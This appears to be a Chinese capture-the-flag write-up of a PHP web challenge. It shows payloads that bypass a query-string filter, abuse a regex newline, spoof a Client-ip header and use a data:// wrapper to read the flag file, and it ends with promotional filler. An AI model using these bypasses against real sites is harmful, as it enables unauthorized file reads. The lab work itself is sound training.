打开靶机:

查看源码发现 代码:
$query = $_SERVER['QUERY_STRING'];
if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
die('Y0u are So cutE!');
}
if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){
echo "you are going to the next ~";
}
解析:
第一个if判断传参的字符串,不能有_和%5f
绕过:PHP会将传参中的空格( )、小数点(.)自动替换成下划线
第二个if判断get传参b_u_p_t不等于23333 并且开头和结尾和中间必须是23333
绕过:在23333结尾加个换行符url编码为%0a 即可绕过,
paylaod:
**1) ?b.u.p.t=23333%0a
2) ?b u p t=23333%0a**

发现 secrettw.php
进入得

hackbar修改HTTP头无用
查看原码发现 一段jsfuck编码:

解码得
**post me Merak
**
随便用POST方法给Merak一个值

发现代码
Flag is here~But how to get it?
<?php
error_reporting(0);
include 'takeip.php';
ini_set('open_basedir','.');
include 'flag.php';
if(isset($_POST['Merak'])){
highlight_file(__FILE__);
die();
}
function change($v){
$v = base64_decode($v);
$re = '';
for($i=0;$i<strlen($v);$i++){
$re .= chr ( ord ($v[$i]) + $i*2 );
}
return $re;
}
echo 'Local access only!'."<br/>";
$ip = getIp();
if($ip!='127.0.0.1')
echo "Sorry,you don't have permission! Your ip is :".$ip;
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' ){
echo "Your REQUEST is:".change($_GET['file']);
echo file_get_contents(change($_GET['file'])); }
?>
代码解析 :
1、来源ip是127.0.0.1 用 Client-ip
2、get参数2333传来的值,使用文件流打开后内容为
todat is a happy day
3、file_get_contents用php伪协议绕过4.反写change加密函数
反写 exp:
<?php function unchange($v){ $re = ''; for($i=0;$i
最后 payload:
**?2333=data:text/plain,todat is a happy day &file=ZmpdYSZmXGI= **
Client-ip : 127.0.0.1

查看源码 得 FALG

网络安全工程师企业级学习路线
这时候你当然需要一份系统性的学习路线
如图片过大被平台压缩导致看不清的话,可以在文末下载(无偿的),大家也可以一起学习交流一下。

一些我收集的网络安全自学入门书籍

一些我白嫖到的不错的视频教程:

上述资料【扫下方二维码】就可以领取了,无偿分享

文章描述了一个网络安全挑战,涉及PHP代码分析,包括对查询字符串的检测、GET参数的验证以及JSFuck编码。通过解码和构造特定payload,可以绕过限制并访问特定内容。当IP满足条件并提供正确数据时,可以触发文件内容显示。
2520

被折叠的 条评论
为什么被折叠?



